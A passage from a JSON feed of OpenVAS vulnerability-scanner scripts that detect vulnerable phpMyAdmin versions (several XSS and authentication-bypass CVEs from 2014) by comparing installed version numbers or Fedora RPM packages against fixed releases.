script_oid(\"1.3.6.1.4.1.25623.1.0.112019\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:56", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112018", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112018\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:39", "description": "Check the version of phpMyAdmin", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-11983", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868390", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868390", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-11983\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868390\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-12 05:57:00 +0200 (Sun, 12 Oct 2014)\");\n script_cve_id(\"CVE-2014-7217\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-11983\");\n script_tag(name:\"summary\", value:\"Check the version of phpMyAdmin\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11983\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140407.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:24", "description": "Check the version of phpMyAdmin", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-12085", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868359", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-12085\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868359\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:24 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7217\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-12085\");\n script_tag(name:\"summary\", value:\"Check the version of phpMyAdmin\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12085\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139903.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.9.1~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:14", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112015", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_oct14_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112015\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 11:38:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.9.1, 4.1.x prior to 4.1.14.5, and 4.0.x prior to 4.0.10.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.9.1, 4.1.14.5 or 4.0.10.4.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.4\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.4\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.5\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.5\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.9.1\" ) ) {\n vuln = TRUE;\n fix = \"4.2.9.1\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:26", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112014", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_oct14_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112014\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 11:38:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.9.1, 4.1.x prior to 4.1.14.5, and 4.0.x prior to 4.0.10.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.9.1, 4.1.14.5 or 4.0.10.4.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.4\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.4\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.5\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.5\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.9.1\" ) ) {\n vuln = TRUE;\n fix = \"4.2.9.1\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:37", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112016", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112016\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:34", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112017", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112017", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112017\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( 